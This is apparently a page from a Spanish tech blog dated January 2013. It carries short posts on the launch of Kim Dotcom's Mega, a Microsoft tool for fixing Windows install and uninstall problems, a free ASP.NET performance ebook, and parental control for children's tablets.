Pero, ¿cómo van a conseguir no volver a sentarse en el banquillo como les sucedió con Megaupload? Para eludir las responsabilidades penales que ya sufrieron hace un año, Dotcom y sus socios han decidido encriptar toda la información contenida en sus servidores, de forma que es el propio usuario quien controla el cifrado y el acceso a sus archivos, tal como se detalla en su web.

La gran expectación generada por el lanzamiento oficial de Mega,  provocó que sus primeras  horas de vida no fueran nada fáciles. La plataforma no pudo soportar el aluvión de demandas de registro y visitas, dando lugar a una sobrecarga que hizo que el rendimiento de la página, tanto a la hora de tramitar un alta como de subir archivos, se convirtiera en una tarea larga y pesada.

Como era de esperar, los internautas no tardaron en criticar la mala calidad del servicio, a lo que Dotcom respondió disculpándose y asegurando que trabajarían sin descanso, con el fin de que Mega “opere normalmente en las próximas 48 horas”.

Siluetas_ Mega

Con el tiempo veremos si el nuevo invento creado por Kim Dotcom, Mathias Ortmann, Bram van der Kolk y Finn Batato tiene el mismo éxito que su antecesor. Por el momento, los primeros pasos de Mega nos han dejado un sabor agridulce.

Solucionar problemas al desinstalar/instalar aplicaciones en Windows

Publicado en General en enero 18, 2013 11:17 am

Una buena manera de mantener limpio vuestro sistema para que funcione tan rápido cómo el primer día es desinstalar todas aquellas aplicaciones que no utilices. Lamentablemente, en algunas ocasiones se producen problemas al tratar de desinstalar las aplicaciones desde la utilidad Agregar o quitar programas de Windows.

Para resolver esto, Microsoft tiene una aplicación que revisará el registro en buscar de problemas y te ayudará a instalar o quitar todas esas aplicaciones que se resisten. Es necesario descargarse esta utilidad desde la web de soporte de MS. Este es el enlace.

Fix It

[Ebook gratis] 50 TIPS para resolver problemas de rendimiento en ASP.NET

Publicado en Desarrollo web General en enero 17, 2013 8:05 am

50 Ways to Avoid, Find and Fix ASP.NET Performance Issues

Una selección de 50 recomendaciones a la hora de programar aplicaciones ASP.NET de la mano de reconocidos developers y ofrecido por RedGate. Podéis encontrarlo en este enlace.

50 Ways to Avoid, Find, and Fix ASP.NET Performance Issues cover

  • 50 tips from the ASP.NET and SQL Server communities for boosting performance in your ASP.NET app.
  • Learn the secrets of your fellow developers and read advice from MVPs and other experts.
  • Covers performance problems in .NET code, SQL Server queries, interactions between code and database, and more…

Fuente: Jersson on Geeks.ms

La tablet, el regalo estrella de estas Navidades

Publicado en General Novedades en enero 7, 2013 5:12 pm

Control parental

Uno de los regalos estrella de estas Navidades han sido las tablets para niños.
Desde muchas webs se han realizado recomendaciones de tablets para niños

Cuando un niño pide una tablet, a sus padres se les suelen presentar muchas dudas.
Son muchos los beneficios que se pueden plantear,  desde la pronta iniciación en el manejo de las nuevas tecnologías hasta la mejora de reflejos y habilidades, así como el aprendizaje de infinidad de cuestiones a través de métodos más divertidos e interactivos.
Pero son también muchos los peligros y amenazas: ciberacoso, accesos a contenido “no apropiado” o la salvaguarda de la privacidad.
Por estos motivos,  en estas fechas también han proliferado los decálogos para el buen uso de estas tecnologías:

Realmente no se trata de otra cosa que aplicar sentido común.

–    Estar presente cuando los más pequeños comienzan a usar las tecnologías y, a medida que evolucionan,  hacerles partícipes de las normas de seguridad básicas en las redes sociales o al acceder a contenidos en Internet
–    Tratar de conocer las aplicaciones o redes sociales a las que se tiene acceso para educar a la hora de publicar y compartir contenidos de acuerdo con esos criterios  de seguridad.
Por supuesto, existen herramientas que ayudan a gestionar ese control parental. La OSI (Oficina de Seguridad del Internauta) pone a disposición de los padres un sitio web en donde expone muchos temas relacionados con esta temática  y ofrece también información sobre muchas aplicaciones de control parental

La verdad es que, en la actualidad, viendo manejar las tablets a los niños, uno se pregunta si ya nacemos con “un chip activado” que nos permite manejar los dispositivos de forma innata ¿o será una habilidad que hemos desarrollado recientemente y que dejamos en herencia a nuestro futuro?. Es una reflexión que dejamos en vuestras manos, pero antes de que continuéis con ella queremos que accedáis al siguiente enlace que os facilitamos: pincha aquí